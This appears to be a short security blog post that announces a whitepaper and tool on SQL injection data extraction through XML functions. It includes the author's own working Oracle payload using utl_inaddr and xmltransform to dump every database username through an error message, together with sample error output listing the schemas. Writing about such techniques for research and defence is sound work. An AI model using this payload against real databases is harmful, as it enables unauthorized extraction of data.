New SQL Injection Whitepaper (for SQL Server)

 Daniel Kachakil released an interesting whitepaper about fast data extraction using SQL Injection and XML statements on SQL server and a tool implementing this technique called SFX-SQLI.

The paper describes how to retrieve data from a SQL Server database using SQL Injection and XML. This technique is not new (for me). I am using such techniques in the Oracle environment via xmltransform or stragg since a while. It is possible to retrieve the entire content of a table in a single error message…

More details will be available on the SQL Injection book I am currently writing with some other security researchers…

The tool SFX-SQLI implements the concept for SQL Server.

Here is one of the examples how to export an entire table, e.g. via utl_inaddr. The output is limited to 4000 byte:

or 1= utl_inaddr.get_host_name((select xmltransform(sys_xmlagg(sys_xmlgen(username)),xmltype(‚< ?xml version=“1.0″?> ;
‚)).getstringval() listagg from all_users))–

Warning: ociexecute(): OCIStmtExecute: ORA-29257: host CUSTCOM_PROD;WEBTOOL;WEBDB;NELLDB;ERDB;B2B;BI;PM;SH;IX;OE;HR;SCOTT;MGMT_VIEW;MDDATA;SYSMAN;MDSYS;SI_INFORMTN_SCHEMA;ORDPLUGINS;ORDSYS;OLAPSYS;ANONYMOUS;XDB;CTXSYS;EXFSYS;WMSYS;DBSNMP;TSMSYS;DIP;OUTLN;SYSTEM;SYS; unknown ORA-06512: at „SYS.UTL_INADDR“, line 4 ORA-06512: at „SYS.UTL_INADDR“, line 35

Leave a Reply

You must be logged in to post a comment.